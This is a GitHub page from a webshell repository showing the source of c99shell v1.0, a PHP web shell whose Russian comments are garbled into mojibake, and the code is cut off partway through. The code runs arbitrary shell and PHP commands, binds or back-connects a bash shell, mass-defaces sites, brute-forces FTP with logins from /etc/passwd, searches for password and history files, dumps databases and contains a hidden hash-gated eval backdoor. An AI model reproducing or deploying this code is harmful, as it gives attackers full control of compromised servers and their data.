nmmqq.php?/lspc.html,webshell/c99shell_v1.0.php.php.txt at master · tennc/webshell · GitHub

/*

******************************************************************************************************

*

* c99shell.php v.1.0 (îò 5.02.2005)

* Freeware WEB-Shell.

* © CCTeaM.

* c99shell.php - øåëë ÷åðåç www-áðîóçåð.

* Âû ìîæåòå ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà: http://ccteam.ru/releases/c99shell

*

* WEB: http://ccteam.ru

* UIN: 656555

*

* Âîçìîæíîñòè:

* ~ óïðàâëåíèå ôàéëàìè/ïàïêàìè, çàêà÷èâàíèå è ñêà÷èâàíèå ôàéëîâ è ïàïêîê (ïðåäâîðèòåëüíî ñæèìàåòñÿ â tar)

* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè

ðåäàêòèðîâàíèè ôàéëîâ (âûêë./âêë. ïàðàìåòðîì $filestealth)

* ~ ïðîäâèíóòûé ïîèñê ïî ôàéëàì/ïàïêàì (èùåò òàêæå âíóòðè ôàéëîâ)

* ~ óïðàâëåíèå ïðîöåññàìè unix-ìàøèíû, âîçìîæíîñòü îòïðàâêè ñèãíàëà çàâåðøåíèÿ,

à òàêæå áàíàëüíîå "ïðèáèâàíèå" ïðîöåññà.

* ~ óäîáíîå (èíîãäà ãðàôè÷åñêîå) âûïîëíåíèå øåëë-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ëåãêî äîáàâëÿòü/óäàëÿòü èõ)

* ~ âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà

* ~ âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà

* ~ áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç

/etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)

* ~ ïðîäâèíóòûé ìåíåäæåð SQL

* ~ ñêðèïò "ëþáèò" include, äëÿ íîðìàëüíîé ðàáîòû, Âàì íóæíî ñìåíèòü $surl.

* ~ âîçìîæíîñòü çàáèíäèòü /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,

èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ,

è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).

*

*

* 5.02.2005 © Captain Crunch Security TeaM

*

* Coded by tristram

******************************************************************************************************

*/

$shver = "1.0 beta (5.02.2005)"; //Current version

//CONFIGURATION

$surl = "?"; //link to this script, INCLUDE "?".

$rootdir = "./"; //e.g "c:", "/","/home"

$timelimit = 60; //limit of execution this script (seconds).

//Authentication

$login = ""; //login

//DON'T FOGOT ABOUT CHANGE PASSWORD!!!

$pass = ""; //password

$md5_pass = ""; //md5-cryped pass. if null, md5($pass)

$login = false; //turn off authentication

$autoupdate = true; //Automatic updating?

$updatenow = false; //If true, update now

$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server

$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod

$filestealth = 1; //if true, don't change modify&access-time

$donated_html = ""; //If you publish free shell and you wish

//add link to your site or any other information,

//put here your html.

$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.

$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")

$curdir = "./"; //start directory

$tmpdir = dirname(__FILE__); //Directory for tempory files

// Registered file-types.

// array(

// "{action1}"=>array("ext1","ext2","ext3",...),

// "{action2}"=>array("ext1","ext2","ext3",...),

// ...

// )

$ftypes = array(

"html"=>array("html","htm","shtml"),

"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),

"exe"=>array("sh","install","bat","cmd"),

"ini"=>array("ini","inf"),

"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),

"img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),

"sdb"=>array("sdb"),

"phpsess"=>array("sess"),

"download"=>array("exe","com","pif","src","lnk","zip","rar")

);

$hexdump_lines = 8;// lines in hex preview file

$hexdump_rows = 24;// 16, 24 or 32 bytes in one line

$nixpwdperpage = 9999; // Get first N lines from /etc/passwd

$bindport_pass = "c99";// default password for binding

$bindport_port = "11457";// default port for binding

/* Command-aliases system */

$aliases = array();

$aliases[] = array("-----------------------------------------------------------", "ls -la");

/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");

/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");

/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");

/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");

/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");

/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");

/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");

/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");

/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");

/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");

/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");

/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");

/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");

/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");

/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");

/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");

/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");

/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");

/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");

$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"

$sess_cookie = "c99shvars"; // cookie-variable name

if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}

$sess_file = $tmpdir."c99shvars_".$sid.".tmp";

$usefsbuff = true; //Buffer-function

$copy_unset = false; //Delete copied files from buffer after pasting

//Quick launch

$quicklaunch = array();

$quicklaunch[] = array("%5C%22%22.%24surl.%22act=img&img=home%5C%22",$surl);

$quicklaunch[] = array("%5C%22%22.%24surl.%22act=img&img=back%5C%22","#\" οnclick=\"history.back(1)");

$quicklaunch[] = array("%5C%22%22.%24surl.%22act=img&img=forward%5C%22","#\" οnclick=\"history.go(1)");

$quicklaunch[] = array("%5C%22%22.%24surl.%22act=img&img=up%5C%22",$surl."act=ls&d=%upd");

$quicklaunch[] = array("%5C%22%22.%24surl.%22act=img&img=refresh%5C%22","");

$quicklaunch[] = array("%5C%22%22.%24surl.%22act=img&img=search%5C%22",$surl."act=search&d=%d");

$quicklaunch[] = array("%5C%22%22.%24surl.%22act=img&img=buffer%5C%22",$surl."act=fsbuff&d=%d");

$quicklaunch[] = array("Mass deface",$surl."act=massdeface&d=%d");

$quicklaunch[] = array("Bind",$surl."act=bind&d=%d");

$quicklaunch[] = array("Processes",$surl."act=ps_aux&d=%d");

$quicklaunch[] = array("FTP Quick brute",$surl."act=ftpquickbrute&d=%d");

$quicklaunch[] = array("LSA",$surl."act=lsa&d=%d");

$quicklaunch[] = array("SQL",$surl."act=sql&d=%d");

$quicklaunch[] = array("PHP-code",$surl."act=eval&d=%d");

$quicklaunch[] = array("PHP-info",$surl."act=phpinfo\" target=\"blank=\"_target");

$quicklaunch[] = array("Self remove",$surl."act=selfremove");

$quicklaunch[] = array("Logout","#\" οnclick=\"if (confirm('Are you sure?')) window.close()");

//Hignlight-code colors

$highlight_bg = "#FFFFFF";

$highlight_comment = "#6A6A6A";

$highlight_default = "#0000BB";

$highlight_html = "#1300FF";

$highlight_keyword = "#007700";

@$f = $_GET[f];

//END CONFIGURATION

// \/Next code not for editing \/

//Starting calls

if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}

error_reporting(5);

@ignore_user_abort(true);

@set_magic_quotes_runtime(0);

@set_time_limit(0);

if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}

if(!ini_get("register_globals")) {import_request_variables("GPC");}

$starttime = getmicrotime();

if (get_magic_quotes_gpc())

{

if (!function_exists("strips"))

{

function strips(&$el)

{

if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} }

else {$el = stripslashes($el);}

}

}

strips($GLOBALS);

}

$tmp = array();

foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));}

$s = "!^(".implode("|",$tmp).")$!i";

if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}

elseif(empty($md5_pass)) {$md5_pass = md5($pass);}

if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))

{

header("WWW-Authenticate: Basic realm=\"c99shell\"");

header("HTTP/1.0 401 Unauthorized");if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}

exit;

}

$lastdir = realpath(".");

chdir($curdir);

if (($selfwrite) or ($updatenow))

{

if ($selfwrite == "1") {$selfwrite = "c99shell.php";}

c99sh_getupdate();

$data = file_get_contents($c99sh_updatefurl);

$fp = fopen($data,"w");

fwrite($fp,$data);

fclose($fp);

exit;

}

if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}

if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}

else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}

if (!is_array($sess_data)) {$sess_data = array();}

if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}

if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}

$sess_data["copy"] = array_unique($sess_data["copy"]);

$sess_data["cut"] = array_unique($sess_data["cut"]);

if (!function_exists("c99_sess_put"))

{

function c99_sess_put($data)

{

global $sess_method;

global $sess_cookie;

global $sess_file;

global $sess_data;

$sess_data = $data;

$data = serialize($data);

if ($sess_method == "file")

{

$fp = fopen($sess_file,"w");

fwrite($fp,$data);

fclose($fp);

}

else {setcookie($sess_cookie,$data);}

}

}

if (!function_exists("str2mini"))

{

function str2mini($content,$len)

{

if (strlen($content) > $len)

{

$len = ceil($len/2) - 2;

return substr($content, 0, $len)."...".substr($content, -$len);

}

else {return $content;}

}

}

if (!function_exists("view_size"))

{

function view_size($size)

{

if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}

elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}

elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}

else {$size = $size . " B";}

return $size;

}

}

if (!function_exists("fs_copy_dir"))

{

function fs_copy_dir($d,$t)

{

$d = str_replace("\\","/",$d);

if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}

$h = opendir($d);

while ($o = readdir($h))

{

if (($o != ".") and ($o != ".."))

{

if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}

else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}

if (!$ret) {return $ret;}

}

}

return true;

}

}

if (!function_exists("fs_copy_obj"))

{

function fs_copy_obj($d,$t)

{

$d = str_replace("\\","/",$d);

$t = str_replace("\\","/",$t);

if (!is_dir($t)) {mkdir($t);}

if (is_dir($d))

{

if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}

if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}

return fs_copy_dir($d,$t);

}

elseif (is_file($d))

{

return copy($d,$t);

}

else {return false;}

}

}

if (!function_exists("fs_move_dir"))

{

function fs_move_dir($d,$t)

{

error_reporting(9999);

$h = opendir($d);

if (!is_dir($t)) {mkdir($t);}

while ($o = readdir($h))

{

if (($o != ".") and ($o != ".."))

{

$ret = true;

if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}

else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}

if (!$ret) {return $ret;}

}

}

return true;

}

}

if (!function_exists("fs_move_obj"))

{

function fs_move_obj($d,$t)

{

$d = str_replace("\\","/",$d);

$t = str_replace("\\","/",$t);

if (is_dir($d))

{

if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}

if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}

return fs_move_dir($d,$t);

}

elseif (is_file($d)) {return rename($d,$t);}

else {return false;}

}

}

if (!function_exists("fs_rmdir"))

{

function fs_rmdir($d)

{

$h = opendir($d);

while ($o = readdir($h))

{

if (($o != ".") and ($o != ".."))

{

if (!is_dir($d.$o)) {unlink($d.$o);}

else {fs_rmdir($d.$o."/"); rmdir($d.$o);}

}

}

closedir($h);

rmdir($d);

return !is_dir($d);

}

}

if (!function_exists("fs_rmobj"))

{

function fs_rmobj($o)

{

$o = str_replace("\\","/",$o);

if (is_dir($o))

{

if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}

return fs_rmdir($o);

}

elseif (is_file($o)) {return unlink($o);}

else {return false;}

}

}

if (!function_exists("myshellexec"))

{

function myshellexec($cmd)

{

return system($cmd);

}

}

if (!function_exists("view_perms"))

{

function view_perms($mode)

{

if (($mode & 0xC000) === 0xC000) {$type = "s";}

elseif (($mode & 0x4000) === 0x4000) {$type = "d";}

elseif (($mode & 0xA000) === 0xA000) {$type = "l";}

elseif (($mode & 0x8000) === 0x8000) {$type = "-";}

elseif (($mode & 0x6000) === 0x6000) {$type = "b";}

elseif (($mode & 0x2000) === 0x2000) {$type = "c";}

elseif (($mode & 0x1000) === 0x1000) {$type = "p";}

else {$type = "?";}

$owner['read'] = ($mode & 00400) ? "r" : "-";

$owner['write'] = ($mode & 00200) ? "w" : "-";

$owner['execute'] = ($mode & 00100) ? "x" : "-";

$group['read'] = ($mode & 00040) ? "r" : "-";

$group['write'] = ($mode & 00020) ? "w" : "-";

$group['execute'] = ($mode & 00010) ? "x" : "-";

$world['read'] = ($mode & 00004) ? "r" : "-";

$world['write'] = ($mode & 00002) ? "w" : "-";

$world['execute'] = ($mode & 00001) ? "x" : "-";

if( $mode & 0x800 ) {$owner['execute'] = ($owner[execute]=="x") ? "s" : "S";}

if( $mode & 0x400 ) {$group['execute'] = ($group[execute]=="x") ? "s" : "S";}

if( $mode & 0x200 ) {$world['execute'] = ($world[execute]=="x") ? "t" : "T";}

return $type.$owner['read'].$owner['write'].$owner['execute'].

$group['read'].$group['write'].$group['execute'].

$world['read'].$world['write'].$world['execute'];

}

}

if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}

if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}

if (!function_exists("c99sh_getupdate"))

{

function c99sh_getupdate()

{

global $updatenow;

$data = @file_get_contents($c99sh_updatefurl);

if (!$data) {echo "Can't fetch update-information!";}

else

{

$data = unserialize(base64_decode($data));

if (!is_array($data)) {echo "Corrupted update-information!";}

else

{

if ($shver < $data[cur]) {$updatenow = true;}

}

}

}

}

if (!function_exists("mysql_dump"))

{

function mysql_dump($set)

{

$sock = $set["sock"];

$db = $set["db"];

$print = $set["print"];

$nl2br = $set["nl2br"];

$file = $set["file"];

$add_drop = $set["add_drop"];

$tabs = $set["tabs"];

$onlytabs = $set["onlytabs"];

$ret = array();

if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}

if (empty($db)) {$db = "db";}

if (empty($print)) {$print = 0;}

if (empty($nl2br)) {$nl2br = true;}

if (empty($add_drop)) {$add_drop = true;}

if (empty($file))

{

global $win;

if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}

else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}

}

if (!is_array($tabs)) {$tabs = array();}

if (empty($add_drop)) {$add_drop = true;}

if (sizeof($tabs) == 0)

{

// retrive tables-list

$res = mysql_query("SHOW TABLES FROM ".$db, $sock);

if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}

}

global $SERVER_ADDR;

global $SERVER_NAME;

$out = "# Dumped by C99Shell.SQL v. ".$shver."

# Home page: http://ccteam.ru

#

# Host settings:

# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."

# Date: ".date("d.m.Y H:i:s")."

# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"

#---------------------------------------------------------

";

$c = count($onlytabs);

foreach($tabs as $tab)

{

if ((in_array($tab,$onlytabs)) or (!$c))

{

if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}

// recieve query for create table structure

$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);

if (!$res) {$ret[err][] = mysql_error();}

else

{

$row = mysql_fetch_row($res);

$out .= $row[1].";\n\n";

// recieve table variables

$res = mysql_query("SELECT * FROM `$tab`", $sock);

if (mysql_num_rows($res) > 0)

{

while ($row = mysql_fetch_assoc($res))

{

$keys = implode("`, `", array_keys($row));

$values = array_values($row);

foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

$values = implode("', '", $values);

$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";

$out .= $sql;

}

}

}

}

}

$out .= "#---------------------------------------------------------------------------------\n\n";

if ($file)

{

$fp = fopen($file, "w");

if (!$fp) {$ret[err][] = 2;}

else

{

fwrite ($fp, $out);

fclose ($fp);

}

}

if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}

return $ret;

}

}

if (!function_exists("c99fsearch"))

{

function c99fsearch($d)

{

global $found;

global $found_d;

global $found_f;

global $a;

if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}

$handle = opendir($d);

while ($f = readdir($handle))

{

$true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));

if($f != "." && $f != "..")

{

if (is_dir($d.$f))

{

if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}

c99fsearch($d.$f);

}

else

{

if ($true)

{

if (!empty($a[text]))

{

$r = @file_get_contents($d.$f);

if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}

if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}

if ($a[text_regexp]) {$true = ereg($a[text],$r);}

else {$true = strinstr($a[text],$r);}

if ($a[text_not])

{

if ($true) {$true = false;}

else {$true = true;}

}

if ($true) {$found[] = $d.$f; $found_f++;}

}

else {$found[] = $d.$f; $found_f++;}

}

}

}

}

closedir($handle);

}

}

//Sending headers

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");

header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");

header("Cache-Control: no-store, no-cache, must-revalidate");

header("Cache-Control: post-check=0, pre-check=0", false);

header("Pragma: no-cache");

global $SERVER_SOFTWARE;

if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}

else {$win = 0;}

if (empty($tmpdir))

{

if (!$win) {$tmpdir = "/tmp/";}

else {$tmpdir = $_ENV[SystemRoot];}

}

$tmpdir = str_replace("\\","/",$tmpdir);

if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")

{

$safemode = true;

$hsafemode = "ON (secure)";

}

else {$safemode = false; $hsafemode = "OFF (not secure)";}

$v = @ini_get("open_basedir");

if ($v or strtolower($v) == "on")

{

$openbasedir = true;

$hopenbasedir = "".$v."";

}

else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}

$sort = htmlspecialchars($sort);

$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE);

@ini_set("highlight.bg",$highlight_bg); //FFFFFF

@ini_set("highlight.comment",$highlight_comment); //#FF8000

@ini_set("highlight.default",$highlight_default); //#0000BB

@ini_set("highlight.html",$highlight_html); //#000000

@ini_set("highlight.keyword",$highlight_keyword); //#007700

@ini_set("highlight.string","#DD0000"); //#DD0000

if ($act != "img")

{

if (!is_array($actbox)) {$actbox = array();}

$dspact = $act = htmlspecialchars($act);

$disp_fullpath = $ls_arr = $notls = null;

$ud = urlencode($d);

?>

echo $HTTP_HOST; ?> - c99shell

!C99Shell v. <?php echo $shver; ?>!

Software: <?php echo $DISP_SERVER_SOFTWARE; ?> 

uname -a: <?php echo php_uname(); ?> 

Safe-mode: <?php echo $hsafemode; ?>

$d = str_replace("\\","/",$d);

if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}

$d = str_replace("\\","/",$d);

if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}

$dispd = htmlspecialchars($d);

$pd = $e = explode("/",substr($d,0,strlen($d)-1));

$i = 0;

echo "Directory: ";

foreach($pd as $b)

{

$t = "";

reset($e);

$j = 0;

foreach ($e as $r)

{

$t.= $r."/";

if ($j == $i) {break;}

$j++;

}

echo "".htmlspecialchars($b)."/";

$i++;

}

echo "   ";

if (is_writable($d))

{

$wd = true;

$wdt = "[ ok ]";

echo "".view_perms(fileperms($d))."";

}

else

{

$wd = false;

$wdt = "[ Read-Only ]";

echo "".view_perms(fileperms($d.$f))."";

}

$free = diskfreespace($d);

if (!$free) {$free = 0;}

$all = disk_total_space($d);

if (!$all) {$all = 0;}

$used = $all-$free;

$used_percent = round(100/($all/$free),2);

echo "Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)
";

if (count($quicklaunch) > 0)

{

foreach($quicklaunch as $item)

{

$item[1] = str_replace("%d",urlencode($d),$item[1]);

$item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);

echo "".$item[0]."    ";

}

}

$letters = "";

if ($win)

{

$abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");

$v = explode("/",$d);

$v = $v[0];

foreach ($abc as $letter)

{

if (is_dir($letter.":/"))

{

if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";}

else {$letters .= "[ ".$letter." ] ";}

}

}

if (!empty($letters)) {echo "Detected drives: ".$letters;}

}

?>

<?php

if ((!empty($donated_html)) and (in_array($act,$donated_act)))

{

?>

<?php echo $donated_html; ?>
<?php

}

?>

<?php

if ($act == "") {$act = $dspact = "ls";}

if ($act == "sql")

{

$sql_surl = $surl."act=sql";

if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}

if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}

if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}

if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}

if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}

$sql_surl .= "&";

?>

<?php

if ($sql_server)

{

$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);

$err = mysql_error();

@mysql_select_db($sql_db,$sql_sock);

if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}

}

else {$sql_sock = false;}

echo "SQL Manager:
";

if (!$sql_sock)

{

if (!$sql_server) {echo "NO CONNECTION";}

else {echo "

Can't connect
"; echo " ".$err."";}

}

else

{

$sqlquicklaunch = array();

$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");

if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" οnclick=\"alert('Please, select DB!')");}

else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}

$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");

$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");

$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");

$sqlquicklaunch[] = array("Logout",$surl."act=sql");

echo "

MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
";

if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}

echo "

";

}

echo "

if (!$sql_sock) {?>

i
If login is null, login is owner of process.If host is null, host is localhostIf port is null, port is 3306 (default)
 Please, fill the form:
UsernamePassword 
HOSTPORT

else

{

//Start left panel

if (!empty($sql_db))

{

?>

">Home
<?php

$result = mysql_list_tables($sql_db);

if (!$result) {echo mysql_error();}

else

{

echo "---[ ".htmlspecialchars($sql_db)." ]---
";

$c = 0;

while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")

"; mysql_free_result($count); $c++;}

if (!$c) {echo "No tables found in database.";}

}

}

else

{

?>

Home
<?php

$result = mysql_list_dbs($sql_sock);

if (!$result) {echo mysql_error();}

else

{

?>

<?php

echo "Databases (...)

";

$c = 0;

while ($row = mysql_fetch_row($result)) {echo "".$row[0]."

"; $c++;}

}

?>


Please, select database
<?php

}

//End left panel

echo "

";

//Start center panel

if ($sql_db)

{

echo "

There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
";

if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}

echo "

";

$acts = array("","dump");

if ($sql_act == "query")

{

echo "


";

if ($submit)

{

if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";}

}

if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}

if ((!$submit) or ($sql_act)) {echo "

"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "".htmlspecialchars($sql_query)." ";}

}

if (in_array($sql_act,$acts))

{

?>

Create new table: SQL-Dump DB:"> 
<?php

if (!empty($sql_act)) {echo "


";}

if ($sql_act == "newtpl")

{

echo "";

if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
";

}

else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_error();}

}

elseif ($sql_act == "dump")

{

$set = array();

$set["sock"] = $sql_sock;

$set["db"] = $sql_db;

$dump_out = "print";

if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}

elseif ($dump_out == "download")

{

@ob_clean();

header("Content-type: c99shell");

header("Content-disposition: attachment; filename=\"".$f."\";");

$set["print"] = 1;

